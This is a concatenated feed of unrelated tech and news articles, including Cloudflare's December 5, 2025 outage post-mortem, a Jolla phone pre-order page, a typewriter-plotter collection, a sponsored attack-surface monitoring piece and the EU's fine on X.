MetaComputing is now offering an alternative to Intel, AMD and the Snapdragon X series. Specifically, the company has introduced a mainboard that can be installe in the Framework Laptop 13 or in a mini PC case. This mainboard is equipped with a CIX CP8180 ARM chipset, which is also found inside the Minisforum MS-R1 . This processor has a total of eight ARM Cortex-A720 performance cores, the two fastest can hit boost clock speeds of up to 2.6 GHz. Moreover, there are four Cortex-A520 efficiency cores.

The mainboard can be installed in the Framework Laptop 13 or a mini PC case (Image source: MetaComputing)
The mainboard can be installed in the Framework Laptop 13 or a mini PC case (Image source: MetaComputing)

Additionally, there’s an ARM Immortalis-G720 GPU with ten cores and an AI accelerator with a performance of 30 TOPS. This chipset is likely slower than the Snapdragon X Elite or a current flagship smartphone chip, but it should still provide enough performance for many everyday tasks. Either way, this mainboard upgrade might only be interesting for developers for the most part, because early tests show that the SoC already draws about 16 watts at idle, which means battery life will likely be fairly short when combined with the 55Wh battery of the Framework Laptop 13.

Price and availability

The MetaComputing ARM AI PC Kit is available now at the manufacturer’s official online shop . The base model with 16GB RAM, 1TB SSD and a mini PC case costs $549. The mainboard can be installed in a previously purchased Framework Laptop 13. Users who don’t own a Framework Laptop can order a bundle including the notebook for $999. MetaComputing charges an additional $100 for 32GB RAM. Shipping is free worldwide, but these list prices do not include import fees or taxes.

Related Articles

Hannes Brecher, 2025-12- 4 (Update: 2025-12- 4)

Cloudflare outage on December 5, 2025

Hacker News
blog.cloudflare.com
2025-12-05 15:35:43
Comments...
Original Article

2025-12-05

5 min read

On December 5, 2025, at 08:47 UTC (all times in this blog are UTC), a portion of Cloudflare’s network began experiencing significant failures. The incident was resolved at 09:12 (~25 minutes total impact), when all services were fully restored.

A subset of customers were impacted, accounting for approximately 28% of all HTTP traffic served by Cloudflare. Several factors needed to combine for an individual customer to be affected as described below.

The issue was not caused, directly or indirectly, by a cyber attack on Cloudflare’s systems or malicious activity of any kind. Instead, it was triggered by changes being made to our body parsing logic while attempting to detect and mitigate an industry-wide vulnerability disclosed this week in React Server Components.

Any outage of our systems is unacceptable, and we know we have let the Internet down again following the incident on November 18. We will be publishing details next week about the work we are doing to stop these types of incidents from occurring.

What happened

The graph below shows HTTP 500 errors served by our network during the incident timeframe (red line at the bottom), compared to unaffected total Cloudflare traffic (green line at the top).

500 error codes served by Cloudflare’s network during the incident

Cloudflare's Web Application Firewall (WAF) provides customers with protection against malicious payloads, allowing them to be detected and blocked. To do this, Cloudflare’s proxy buffers HTTP request body content in memory for analysis. Before today, the buffer size was set to 128KB.

As part of our ongoing work to protect customers using React against a critical vulnerability, CVE-2025-55182 , we started rolling out an increase to our buffer size to 1MB, the default limit allowed by Next.js applications. We wanted to make sure as many customers as possible were protected.

This change was being rolled out using our gradual deployment system, and, as part of this rollout, we identified an increase in errors in one of our internal tools which we use to test and improve new WAF rules. As this was an internal tool, and the fix being rolled out was a security improvement, we decided to disable the tool for the time being as it was not required to serve or protect customer traffic.

Disabling this was done using our global configuration system. This system does not use gradual rollouts but rather propagates changes within seconds to the entire network and is under review following the outage we recently experienced on November 18 .

In our FL1 version of our proxy under certain circumstances, this latter change caused an error state that resulted in 500 HTTP error codes to be served from our network.

As soon as the change propagated to our network, code execution in our FL1 proxy reached a bug in our rules module which led to the following LUA exception:

[lua] Failed to run module rulesets callback late_routing: /usr/local/nginx-fl/lua/modules/init.lua:314: attempt to index field 'execute' (a nil value)

resulting in HTTP code 500 errors being issued.

The issue was identified shortly after the change was applied, and was reverted at 09:12, after which all traffic was served correctly.

Customers that have their web assets served by our older FL1 proxy AND had the Cloudflare Managed Ruleset deployed were impacted. All requests for websites in this state returned an HTTP 500 error, with the small exception of some test endpoints such as /cdn-cgi/trace .

Customers that did not have the configuration above applied were not impacted. Customer traffic served by our China network was also not impacted.

The runtime error

Cloudflare’s rulesets system consists of sets of rules which are evaluated for each request entering our system. A rule consists of a filter, which selects some traffic, and an action which applies an effect to that traffic. Typical actions are “ block ”, “ log ”, or “ skip ”. Another type of action is “ execute ”, which is used to trigger evaluation of another ruleset.

Our internal logging system uses this feature to evaluate new rules before we make them available to the public. A top level ruleset will execute another ruleset containing test rules. It was these test rules that we were attempting to disable.

We have a killswitch subsystem as part of the rulesets system which is intended to allow a rule which is misbehaving to be disabled quickly. This killswitch system receives information from our global configuration system mentioned in the prior sections. We have used this killswitch system on a number of occasions in the past to mitigate incidents and have a well-defined Standard Operating Procedure, which was followed in this incident.

However, we have never before applied a killswitch to a rule with an action of “ execute ”. When the killswitch was applied, the code correctly skipped the evaluation of the execute action, and didn’t evaluate the sub-ruleset pointed to by it. However, an error was then encountered while processing the overall results of evaluating the ruleset:

if rule_result.action == "execute" then
  rule_result.execute.results = ruleset_results[tonumber(rule_result.execute.results_index)]
end

This code expects that, if the ruleset has action=”execute”, the “rule_result.execute” object will exist. However, because the rule had been skipped, the rule_result.execute object did not exist, and Lua returned an error due to attempting to look up a value in a nil value.

This is a straightforward error in the code, which had existed undetected for many years. This type of code error is prevented by languages with strong type systems. In our replacement for this code in our new FL2 proxy, which is written in Rust, the error did not occur.

What about the changes being made after the incident on November 18, 2025?

We made an unrelated change that caused a similar, longer availability incident two weeks ago on November 18, 2025. In both cases, a deployment to help mitigate a security issue for our customers propagated to our entire network and led to errors for nearly all of our customer base.

We have spoken directly with hundreds of customers following that incident and shared our plans to make changes to prevent single updates from causing widespread impact like this. We believe these changes would have helped prevent the impact of today’s incident but, unfortunately, we have not finished deploying them yet.

We know it is disappointing that this work has not been completed yet. It remains our first priority across the organization. In particular, the projects outlined below should help contain the impact of these kinds of changes:

  • Enhanced Rollouts & Versioning : Similar to how we slowly deploy software with strict health validation, data used for rapid threat response and general configuration needs to have the same safety and blast mitigation features. This includes health validation and quick rollback capabilities among other things.

  • Streamlined break glass capabilities: Ensure that critical operations can still be achieved in the face of additional types of failures. This applies to internal services as well as all standard methods of interaction with the Cloudflare control plane used by all Cloudflare customers.

  • "Fail-Open" Error Handling: As part of the resilience effort, we are replacing the incorrectly applied hard-fail logic across all critical Cloudflare data-plane components. If a configuration file is corrupt or out-of-range (e.g., exceeding feature caps), the system will log the error and default to a known-good state or pass traffic without scoring, rather than dropping requests. Some services will likely give the customer the option to fail open or closed in certain scenarios. This will include drift-prevention capabilities to ensure this is enforced continuously.

Before the end of next week we will publish a detailed breakdown of all the resiliency projects underway, including the ones listed above. While that work is underway, we are locking down all changes to our network in order to ensure we have better mitigation and rollback systems before we begin again.

These kinds of incidents, and how closely they are clustered together, are not acceptable for a network like ours. On behalf of the team at Cloudflare we want to apologize for the impact and pain this has caused again to our customers and the Internet as a whole.

Timeline

Time (UTC)

Status

Description

08:47

INCIDENT start

Configuration change deployed and propagated to the network

08:48

Full impact

Change fully propagated

08:50

INCIDENT declared

Automated alerts

09:11

Change reverted

Configuration change reverted and propagation start

09:12

INCIDENT end

Revert fully propagated, all traffic restored

Cloudflare's connectivity cloud protects entire corporate networks , helps customers build Internet-scale applications efficiently , accelerates any website or Internet application , wards off DDoS attacks , keeps hackers at bay , and can help you on your journey to Zero Trust .

Visit 1.1.1.1 from any device to get started with our free app that makes your Internet faster and safer.

To learn more about our mission to help build a better Internet, start here . If you're looking for a new career direction, check out our open positions .

Outage Post Mortem

Related posts

November 18, 2025 12:00 AM

Cloudflare outage on November 18, 2025

Cloudflare suffered a service outage on November 18, 2025. The outage was triggered by a bug in generation logic for a Bot Management feature file causing many Cloudflare services to be affected. ...

    By

November 18, 2025 12:00 AM

Cloudflare outage on November 18, 2025

Cloudflare suffered a service outage on November 18, 2025. The outage was triggered by a bug in generation logic for a Bot Management feature file causing many Cloudflare services to be affected. ...

    By

October 28, 2025 12:00 PM

Online outages: Q3 2025 Internet disruption summary

In Q3 2025, we observed Internet disruptions around the world resulting from government directed shutdowns, power outages, cable cuts, a cyberattack, an earthquake, a fire, and technical problems, as well as several with unexplained causes. ...

    By

Jolla Phone Pre-Order

Hacker News
commerce.jolla.com
2025-12-05 15:15:12
Comments...
Original Article

Performance Meets Privacy

  • 5G with dual nano-SIM
  • 12GB RAM and 256GB storage expandable up to 2TB
  • Sailfish OS 5
  • Support for Android apps with Jolla AppSupport
  • User replaceable back cover with colour options
  • User replaceable battery
  • Physical Privacy Switch

Privacy by Design

  • No tracking, no calling home, no hidden analytics
  • User configurable physical Privacy Switch - turn off you microphone, bluetooth, Android apps, or whatever you wish

Scandinavian styling in its pure form

  • Honouring the original Jolla Phone form factor and design
  • Replaceable back cover
  • Available in three distinct colours inspired by Nordic nature

Available in distinct user replaceable colours

  • Snow White
  • Kaamos Black
  • The Orange

An Independent Linux Phone

A successor to the iconic original Jolla Phone from 2013, brought to 2026 with modern specs and honoring the Jolla heritage design. And faster, smoother, more capable than the current Jolla C2.

A phone you can actually daily-drive. Still Private. Still Yours.

Defined together with the Community

Over the past months, Sailfish OS community members voted on what the next Jolla device should be. The key characteristics, specifications and features of the device.

Based on community voting and real user needs, this device has only one mission:

Put control back in your hands.

KEY BENEFITS OF PRE-ORDERING

Special Edition Back Cover — Pre-order batch only

Made as a thank-you to early supporters

Directly contribute in making the product a reality

  • Community Voice, Real Device: The questionnaire received overwhelming flow of input and this project captures that
  • Now it is time to act! Your pre-order determines whether the project becomes reality
  • Built for Longevity

    Sailfish OS is proven to outlive mainstream support cycles. Long-term OS support, guaranteed for minimum 5 years. Incremental updates, and no forced obsolescence.

  • Your Phone Shouldn’t Spy on You

    Mainstream phones send vast amounts of background data. A common Android phone sends megabytes of data per day to Google even if the device is not used at all.

    Sailfish OS stays silent unless you explicitly allow connections.

DIT: DO IT TOGETHER

This isn’t your regular smartphone project.

It’s a community mission.

  • You voted on the device
  • You guided its specs and definition
  • You shaped the philosophy
  • And now you help bring it to life

Every pre-order makes production become a reality.

Our Community

TECH SPECS

  • SoC: High performant Mediatek 5G platform
  • RAM: 12GB
  • Storage: 256GB + expandable with microSDXC
  • Cellular: 4G + 5G with dual nano-SIM and global roaming modem configuration
  • Display: 6.36” ~390ppi FullHD AMOLED, aspect ratio 20:9, Gorilla Glass
  • Cameras: 50MP Wide + 13MP Ultrawide main cameras, front facing wide-lens selfie camera
  • Battery: approx. 5,500mAh, user replaceable
  • Connectivity: WiFi 6, BT 5.4, NFC
  • Dimensions: ~158 x 74 x 9mm
  • Other: Power key fingerprint reader, user changeable backcover, RGB indication LED, Privacy Switch

Technical specification subject to final confirmation upon final payment and manufacturing. Minor alterations may apply.

FAQ

Why a pre-order system?

Because this is a community-funded device and we need committed pre-orders to turn the designs into a full product program and commit to order the first production batch. If we reach 2,000 units we start the full product program. If not, you get a full refund.

Is the 99 € refundable?

Yes. Fully.

What is the normal price of the product, do I get discount participating to the pre-order?

The final price of the product is not set yet but we estimate it to settle between 599€ - 699€ (incl. your local VAT). The final price depends on the confirmation of the final specification and the Bill-of-Materials, which happens on due course during the product program. Notably in particular memory component prices have had exceptionally high volatility during this year.

By pre-ordering you confirm your special price of total 499€.

Can I cancel anytime?

Yes.

Is this phone real or just a concept?

It is real. Definition and real electro-mechanical design is underway, based on the community voting. To turn the designs into a full product program and commit to order the first batch, we need in minimum 2,000 committed pre-orders.

When will full specs be available?

Once the manufacturing pathway is confirmed at 2,000 pre-orders.

Will there be accessories, like a spare battery and protective case?

Yes, there will be. We’ll make those available on due course the project.

When will the phone ship?

Estimated by end of 1H/2026 .

Will the Jolla Phone work outside Europe, can I use it e.g. in the U.S.?

Yes, we will design the cellular band configuration to enable global travelling as much as possible, including e.g. roaming in the U.S. carrier networks.

Can I buy the Jolla Phone if I’m outside Europe, can I use it e.g. in the U.S.?

The initial sales markets are EU, UK, Switzerland and Norway. Entering other markets, such as the U.S. and Canada are to be decided due course based on potential interest from the areas.

We will design the cellular band configuration to enable potential future markets, including major U.S. carrier networks.

Typewriter plotters

Lobsters
biosrhythm.com
2025-12-05 15:07:51
Comments...
Original Article

Did you know there were typewriters that used ball point pens to draw not just text but also graphics? I’ve collected several of these over the years. Read on to discover a world that you didn’t know existed.

Typewriter plotters could act as a normal typewriter in that you could type on the keys and have the text printed on the page. The difference is it would use a tiny ball point pen to “draw” the text, character by character, onto the page. It’s mesmerizing to watch! Many also included the ability to print graphs and bar charts, although in practice is was likely cumbersome. In addition, some models had the ability to connect to a computer to print text or even custom graphics.

Panasonic RK-P400C Penwriter

Panasonic made three models. The top shelf was the RK-P400C Penwriter which included the RS-232 port built in for computer control. They also came with a white pen for error correcting.

Here’s a video of the Panasonic RK-P400C Penwriter typewritter plotter drawing a design under computer control via RS-232. The manual is available from Archive.org .

Mona Triangles on a Panasonic RK-P400C typewriter plotter.

Panasonic RK-P440 Penwriter

A lower end model was the Panasonic RK-P440 Penwriter. It had a computer input but required the K100 external interface. Otherwise functionally the same: draws texts as well as business graphics with 4 color ballpoint pens. Portable using 6 C batteries.

The Panasonic K-100 interface box connected to the typewriter via a DE-9 port on the side and connected to your computer via either DB-25 RS-232 or Centronics parallel.

Here’s a video of the Panasonic RK-P400 Penwriter plotting the demo page using four ballpoint pens.

Panasonic RK-P200C Penwriter

Panasonic also had the basic RK-P200C Penwriter which removed any computer control but kept the ability to do standalone business graphics. Pic from eBay.

Silver Reed EB50

There were other ballpoint pen based typewriters, such as this Silver Reed EB50 . It draws text and business graphics too but this one has a parallel port to act as a plotter. I added support for it to my workflow and it’s a very good.

Here’s a video of the Silver Reed Colour PenGraph EB50 plotting Schotter. I’ll admit it’s strange seeing this on something with a keyboard.

Smith Corona Graphtext 90

Smith Corona sold the Graphtext 90 . No computer control. Same pens and also ran on batteries.

Brother Type-a-Graph BP-30

Not to be left out, Brother offered the Type-a-Graph BP-30 . Pics from eBay— there’s usually a lot of these for sale.

Sears LXI Type-O-Graph

Even Sears got into the game with the LXI Type-O-Graph (by likely rebranding the Brother Type-a-Graph, they look the same). Mine has a flaw in the print head mechanism.

Sharp EL-7050 Calculator

Adding to the oddware that included pen plotters in them, there was even a calculator with a tiny plotter built-in. This is the Sharp EL-7050 calculator with a built in plotter printer. It could act as a usual printing calculator but it could also draw graphs and pie charts of data sets.

Here’s a video of the Sharp EL-7050 calculator printing the powers of 2.

And here’s the Sharp EL-7050 calculator plotting the graph.

Music Keyboard

Yamaha added a pen plotter to one of their music keyboards, the Yamaha MP-1. The idea was you’d compose music on the keyboard and it would plot the notes on paper as you played. The reality is the plotter was so much slower than you could play, it would take forever to catch up. It also wasn’t great at quantization so the notes were likely not what you’d expect.

Built In Plotters

Many small computers in the 1980s also had plotters available like the Commodore 1520 and the Atari 1020 . They used 4” wide paper and the same pens.

Some “slabtops” had built in pen plotters like the Casio PB-700 , Radio Shack Tandy PC-2 , and Sharp PC-2500 .

Pens

All of the typewriter models used the same ball point pens in four colors (black, red, green, blue) and were portable with a built-in handle and could run on batteries. They also likely all used the same plotter mechanisms made by Alps.

The pens are rather scarce now, mostly all that remains are NOS (new old stock) with some exceptions for a couple of German companies that make replacements for medical equipment that fit.

These pen typewriters were sold during the mid 1980s. In PC World magazine July 1985, the Panasonic RK-P400C retailed for $350.

Mamdani’s First 100 Days, Child Care Edition: 'Fixing What Adams Broke'

hellgate
hellgatenyc.com
2025-12-05 15:07:51
Free universal child care is the incoming mayor's biggest promise—here's what he needs to do immediately to make it happen, according to experts....
Original Article

Zohran Mamdani has an ambitious agenda. What does he need to do immediately during his first 100 days in office to make his promises a reality? And what can his administration do to make life better for New York City residents, right from the jump? Over the next two weeks, Hell Gate will be answering those questions.

First up, a look at his plans for universal free child care.


Zohran Mamdani has consistently said that universal, free child care will be his number one priority when he comes into office as mayor. It is the campaign pledge that has garnered the most vocal support from Governor Kathy Hochul. But it’s also the largest and most complicated undertaking he promised, and the one that comes with the biggest price tag –a cost that Mamdani will need state support to cover. If he wants to deliver on child care, he'll have to position himself to be ready to get to work as soon as he's in office—and to tackle multiple challenges at once.

The first step, multiple experts and advocates said, will have to be to fix what Eric Adams broke. "You can't build a new system on a broken foundation," said Emmy Liss, an independent early childhood consultant who worked on pre-K and 3K under Bill de Blasio.

Give us your email to read the full story

Sign up now for our free newsletters.

Sign up

Covid-19 mRNA Vaccination and 4-Year All-Cause Mortality

Hacker News
jamanetwork.com
2025-12-05 15:07:42
Comments...

I spent hours listening to Sabrina Carpenter this year. So why do I have a Spotify ‘listening age’ of 86?

Guardian
www.theguardian.com
2025-12-05 15:07:00
Many users of the app were shocked, this week, by this addition to the Spotify Wrapped roundup – especially twentysomethings who were judged to be 100 “Age is just a number. So don’t take this personally.” Those words were the first inkling I had that I was about to receive some very bad news. I wok...
Original Article

“Age is just a number. So don’t take this personally.” Those words were the first inkling I had that I was about to receive some very bad news.

I woke up on Wednesday with a mild hangover after celebrating my 44th birthday. Unfortunately for me, this was the day Spotify released “Spotify Wrapped”, its analysis of (in my case) the 4,863 minutes I had spent listening to music on its platform over the past year. And this year, for the first time, they are calculating the “listening age” of all their users.

“Taste like yours can’t be defined,” Spotify’s report informed me, “but let’s try anyway … Your listening age is 86.” The numbers were emblazoned on the screen in big pink letters.

It took a long time for my 13-year-old daughter (listening age: 19) and my 46-year-old husband (listening age: 38) to stop laughing at me. Where did I go wrong, I wondered, feeling far older than 44.

But it seems I’m not alone. “Raise your hand if you felt personally victimised by your Spotify Wrapped listening age,” wrote one user on X. Another post , with a brutal clip of Judi Dench shouting “you’re not young” at Cate Blanchett, was liked more than 26,000 times. The 22-year-old actor Louis Partridge best mirrored my reaction when he shared his listening age of 100 on Instagram stories with the caption: “uhhh”.

“Rage bait” – defined as “online content deliberately designed to elicit anger or outrage” in order to increase web traffic – is the Oxford English Dictionary’s word of the year. And to me, that cheeky little message from Spotify, warning me not to take my personalised assessment of my personal listening habits personally, seemed a prime example.

“How could I have a listening age of 86?” I raged to my family and friends, when the artist I listened to the most this year was 26-year-old Sabrina Carpenter? Since I took my daughter to Carpenter’s concert at Hyde Park this summer, I have spent 722 minutes listening to her songs, making me “a top 3% global fan”.

The only explanation Spotify gave for my listening age of 86 was that I was “into music of the late 50s” this year. But my top 10 most-listened to songs were all released in the past five years and my top five artists included Olivia Dean and Chappell Roan (who released their debut albums in 2023).

Admittedly, Ella Fitzgerald is in there too. But her music is timeless, I raged; surely everyone listens to Ella Fitzgerald? “I don’t,” my daughter said, helpfully. “I don’t,” added my husband.

It’s also true that I occasionally listen to folk music from the 50s and 60s – legends such as Pete Seeger, Bob Dylan and Joan Baez. But when I analysed my top 50 “most listened to” songs, almost all of them (80%) were released in the last five years.

What’s particularly enraging is that Spotify knows my taste is best described as “eclectic” – because that’s how Spotify has described it to me. I have apparently listened to 409 artists in 210 music genres over the past year.

None of it makes sense, until you see the extent to which inciting rage in users like me is paying off for Spotify: in the first 24 hours, this year’s Wrapped campaign had 500 million shares on social media, a 41% increase on last year.

According to Spotify, listening ages are based on the idea of a “reminiscence bump”, which they describe as “the tendency to feel most connected to the music from your younger years”. To figure this out, they looked at the release dates of all the songs I played this year, identified the five-year span of music that I engaged with more than other listeners my age and “playfully” hypothesised that I am the same age as someone who engaged with that music in their formative years.

In other words, no matter how old you are, the more unusual and idiosyncratic and out of step your musical taste is compared with your peers, the more likely it is that Spotify will poke fun at some of the music you enjoy listening to.

But now that I understand this, rather than rising to the bait, I know exactly what to do. I walk over to my dusty, ancient CD player. I insert an old CD I bought when I was a teenager. I turn the volume up to max. And then I play one of my favourite songs, a classic song that everyone who has a listening age of 86 or over will know, like I do, off by heart: You Make Me Feel So Young by Ella Fitzgerald.

Horror game Horses has been banned from sale – but is it as controversial as you’d think?

Guardian
www.theguardian.com
2025-12-05 15:04:14
Pulled by Steam and Epic Games Store, indie horror Horses shook up the industry before it was even released. Now it’s out, all the drama surrounding it seems superfluous On 25 November, award-winning Italian developer Santa Ragione, responsible for acclaimed titles such as MirrorMoon EP and Saturnal...
Original Article

O n 25 November, award-winning Italian developer Santa Ragione, responsible for acclaimed titles such as MirrorMoon EP and Saturnalia, revealed that its latest project, Horses , had been banned from Steam - the largest digital store for PC games. A week later, another popular storefront, Epic Games Store, also pulled Horses, right before its 2 December launch date. The game was also briefly removed from the Humble Store, but was reinstated a day later.

The controversy has helped the game rocket to the top of the digital stores that are selling it, namely itch.io and GOG. But the question remains – why was it banned? Horses certainly delves into some intensely controversial topics (a content warning at the start details, “physical violence, psychological abuse, gory imagery, depiction of slavery, physical and psychological torture, domestic abuse, sexual assault, suicide, and misogyny”) and is upsetting and unnerving.

A still from Horses.
Controversial … Horses. Photograph: Santa Ragione

The plot is fairly simple, though it turns dark fast. You play as Anselmo, a 20-year-old Italian man sent to spend the summer working on a farm to build character. It’s revealed almost immediately (so fast in fact, that I let out a surprised “Ha!”) that the farm Anselmo has been sent to is not a normal one. The “horses” held there are not actually horses, but nude humans wearing horse heads that appear to be permanently affixed.

Your job is to tend to the garden, the “horses” and the “dog” (who is a human wearing a dog head). Anselmo performs menial, frustratingly slow everyday tasks across Horses’ three-ish hour runtime, like chopping wood and picking vegetables. These monotonous tasks are, however, interspersed with horrible and unsettling jobs. On day one, you find a “horse” body hanging from a tree and have to help the farmer bury it.

It’s disturbing, yes, but Horses doesn’t show most of these horrors playing out, and when it does, the simplistic, crude graphics dull its edges (when you encounter the farmer whipping a human “horse” and have to throw hydrogen peroxide on her back, the marks crisscrossing her skin are blurry and unreal).

A still from Horses.
Unsettling … Horses. Photograph: Santa Ragione

The “horses’” genitals and breasts are blurred out. The enslaved are forbidden from fornicating, but you’ll find that they do that anyway (a simplistic, animalistic depiction of sex), and though you’re forced to “tame” them by putting them back in their pen, it’s just a button press to interact, with no indication of what you’ve actually done to them.

Valve, the company that owns Steam, told PC Gamer that Horses’ content was reviewed back in 2023. “After our team played through the build and reviewed the content, we gave the developer feedback about why we couldn’t ship the game on Steam, consistent with our onboarding rules and guidelines,” the statement read. “A short while later the developer asked us to reconsider the review, and our internal content review team discussed that extensively and communicated to the developer our final decision that we were not going to ship the game on Steam.”

According to IGN , Epic Games Store told developer Santa Ragione: “We are unable to distribute Horses on the Epic Games Store because our review found violations of the Epic Games Store Content Guidelines, specifically the ‘Inappropriate Content’ and ‘Hateful or Abusive Content’ policies.” Santa Ragione alleges that “no specifics on what content was at issue were provided.”

Horses’ gameplay is grotesque, not gratuitous. The horror is psychological and lies in the incongruity of performing menial tasks in a veritable hellscape, while having no idea why any of this is going on. There is barely any sound aside from the constant whirring of a film camera (the game is presented like a mostly silent Italian arthouse film), super-up-close shots of mouths moving as they talk or chew, unsettling character models, the occasional cut to a real-life shot of water pouring in a glass or slop filling up a dog bowl.

There is no explicit gore or violence. You are uncomfortable, frustrated and unnerved throughout, and the horrors of humanity are on full display, but nothing ever threatens to upend your lunch. It is an interesting meditation on violence and power dynamics, but it is by no means a shocking or radical game. The conversation that has ignited around it – about video games as art and the censorship of art – is proving to be more profound than the actual content of the game.

A Practical Guide to Continuous Attack Surface Visibility

Bleeping Computer
www.bleepingcomputer.com
2025-12-05 15:00:10
Passive scan data goes stale fast as cloud assets shift daily, leaving teams blind to real exposures. Sprocket Security shows how continuous, automated recon gives accurate, up-to-date attack surface visibility. [...]...
Original Article

Hackers watching

AUTHOR: Topher Lyons, Solutions Engineer at Sprocket Security

The Limits of Passive Internet-Scan Data

Most organizations are familiar with the traditional approach to external visibility: rely on passive internet-scan data, subscription-based datasets, or occasional point-in-time reconnaissance to understand what they have facing the public internet. These sources are typically delivered as static snapshots of lists of assets, open ports, or exposures observed during a periodic scan cycle.

While useful for broad trend awareness, passive datasets are often misunderstood. Many security teams assume they provide a complete picture of everything attackers can see. But in today’s highly dynamic infrastructure, passive data ages quickly.

Cloud footprints shift by the day, development teams deploy new services continuously, and misconfigurations appear (and disappear) far faster than passive scans can keep up.

As a result, organizations relying solely on passive data often make decisions based on stale or incomplete information.

To maintain an accurate, defensive view of the external attack surface, teams need something different: continuous, automated, active reconnaissance that verifies what’s actually exposed every day.

Today’s Attack Surface: Fast-Moving, Fragmented, and Hard to Track

Attack surfaces used to be relatively static. A perimeter firewall, a few public-facing servers, and a DNS zone or two made discovery manageable. But modern infrastructure has changed everything.

  • Cloud adoption has decentralized hosting, pushing assets across multiple providers and regions.
  • Rapid deployment cycles introduce new services, containers, or endpoints.
  • Asset sprawl grows quietly as teams experiment, test, or automate.
  • Shadow IT emerges from marketing campaigns, SaaS tools, vendor-hosted environments, and unmanaged subdomains.

Even seemingly insignificant changes can create material exposure. A DNS record that points to the wrong host, an expired TLS certificate, or a forgotten dev instance can all introduce risk. And because these changes occur constantly, visibility that isn’t refreshed continuously will always fall out of sync with reality.

If the attack surface changes daily, then visibility must match that cadence.

Why Passive Data Fails Modern Security Teams

Stale Findings

Passive scan data becomes outdated quickly. An exposed service may disappear before a team even sees the report, while new exposures emerge that weren’t captured at all. This leads to a common cycle where security teams spend time chasing issues that no longer exist while missing the ones that matter today.

Context Gaps

Passive datasets tend to be shallow. They often lack:

  • Ownership
  • Attribution
  • Root-cause detail
  • Impact context
  • Environmental awareness

Without context, teams can’t prioritize effectively. A minor informational issue may look identical to a severe exposure.

Missed Ephemeral Assets

Modern infrastructure is full of short-lived components. Temporary testing services, auto-scaled cloud nodes, and misconfigured trail environments might live for only minutes or hours. Because passive scans are periodic, these fleeting assets often never appear in the dataset, yet attackers routinely find and exploit them.

Duplicate or Irrelevant Artifacts

Passive data commonly includes leftover DNS records, reassigned IP space, or historical entries that no longer reflect the environment. Teams must manually separate false positives from real issues, increasing alert fatigue and wasting time.

Continuous Reconnaissance: What It Is (and Isn’t)

Automated, Active Daily Checks

Continuous visibility relies on recurring, controlled reconnaissance that automatically verifies external exposure. This includes:

  • Detecting newly exposed services
  • Tracking DNS, certificate, and hosting changes
  • Identifying new reachable hosts
  • Classifying new or unknown assets
  • Validating current exposure and configuration state

This is not exploitation, or intrusive actions. It’s safe, automated enumeration built for defense.

Environment-Aware Discovery

As infrastructure shifts, continuous recon shifts with it. New cloud regions, new subdomains, or new testing environments naturally enter and exit the attack surface. Continuous visibility keeps pace automatically with no manual refresh required.

What Continuous Visibility Reveals (That Passive Data Can’t)

Newly Exposed Services

These exposures often appear suddenly and unintentionally:

  • A forgotten staging server coming online
  • A developer opening RDP or SSH for testing
  • A newly created S3 bucket left public

Daily verification catches these before attackers do.

Misconfigurations Introduced During Deployments

Rapid deployments introduce subtle errors:

  • Certificates misapplied or expired
  • Default configurations restored
  • Ports opened unexpectedly

Daily visibility surfaces them immediately.

Shadow IT and Rogue Assets

Not every externally exposed asset originates from engineering. Marketing microsites, vendor-hosted services, third-party landing pages, and unmanaged SaaS instances often fall outside traditional inventories, yet remain publicly reachable.

Real-Time Validation

Continuous recon ensures findings reflect today’s attack surface. This dramatically reduces wasted effort and improves decision-making.

Turning Reconnaissance into Decision Making

Prioritization Through Verification

When findings are validated and current, security teams can confidently determine which exposures pose the most immediate risk.

Triage Without Hunting Through Noise

Continuous recon removes stale, duplicated, or irrelevant findings before they ever reach an analyst’s queue.

Clear Ownership Paths

Accurate attribution helps teams route issues to the correct internal group, like engineering, cloud, networking, marketing, or a specific application team.

Reduced Alert Fatigue

Security teams stay focused on real, actionable issues rather than wading through thousands of unverified scan entries.

How Sprocket Security Approaches ASM

Sprocket’s ASM Community Edition Dashboard
Sprocket’s ASM Community Edition Dashboard

Daily Reconnaissance at Scale

Sprocket Security performs automated, continuous checks across your entire external footprint. Exposures are discovered and validated as they appear, whether they persist for hours or minutes.

Actionable Findings

Through our ASM framework, each finding is classified, verified, attributed, and prioritized. This ensures clarity, context, and impact without overwhelming volume.

Removing Guesswork from ASM

A validated, contextualized finding tells teams:

  • What changed
  • Why it matters
  • How severe it is
  • Who owns it
  • What action to take

Compared to raw scan data, this eliminates ambiguity and reduces the time it takes to resolve issues.

Getting a Handle on Your Attack Surface

Here are some of the ways that organizations can ensure thorough monitoring of their attack surface:

  1. Maintain an accurate asset inventory.
  2. Implement continuous monitoring.
  3. Prioritize vulnerabilities based on risk.
  4. Automate where possible.
  5. Regularly update and patch systems.

For a deeper dive into improving you attack surface know-how see our full blog on Attack Surface Monitoring: Core Functions, Challenges, and Best Practices .

Modern Security Demands Continuous Visibility

Today’s attack surfaces evolve constantly. Static, passive datasets simply cannot keep up. To stay ahead of emerging exposures and prevent easily avoidable incidents, security teams need continuous, automated reconnaissance that reflects the real state of their environment.

Relying solely on passive data creates blind spots. Continuous visibility closes them. As organizations modernize their infrastructure and accelerate deployment cycles, continuous reconnaissance becomes the foundation of attack surface hygiene, prioritization, and real-world risk reduction.

Sponsored and written by Sprocket Security .

EU fines X $140 million over deceptive blue checkmarks

Bleeping Computer
www.bleepingcomputer.com
2025-12-05 14:41:01
The European Commission has fined X €120 million ($140 million) for violating transparency obligations under the Digital Services Act (DSA). [...]...
Original Article

X (formerly known as Twitter)

The European Commission has fined X €120 million ($140 million) for violating transparency obligations under the Digital Services Act (DSA).

This is the first non-compliance ruling under the DSA, a set of rules adopted in 2022 that requires platforms to remove harmful content and protect users across the European Union.

The fine was issued following a two-year investigation into the platform formerly known as Twitter to determine whether the social network violated the DSA regarding the effectiveness of measures to combat information manipulation and the dissemination of illegal content. The commission's preliminary findings were shared with X in July 2024.

Regulators found that X had breached transparency requirements through its misleading 'blue checkmark' system for 'verified accounts,' its opaque advertising database, and its blocking of researchers' access to public data.

The commission said that X's checkmark misleads users because accounts can purchase the badge without meaningful identity verification. This deceptive design also makes it challenging to assess account authenticity, increasing exposure to fraud and manipulation.

"This deception exposes users to scams, including impersonation frauds, as well as other forms of manipulation by malicious actors," the commission noted. "While the DSA does not mandate user verification, it clearly prohibits online platforms from falsely claiming that users have been verified, when no such verification took place."

X also failed to maintain a transparent advertising repository, as the platform's ad database lacks the accessibility features mandated by the DSA and imposes excessive processing delays that hinder efforts to detect scams, false advertising, and coordinated influence campaigns. It also set up unnecessary barriers that block researchers from accessing public platform data needed to study systemic risks facing European users.

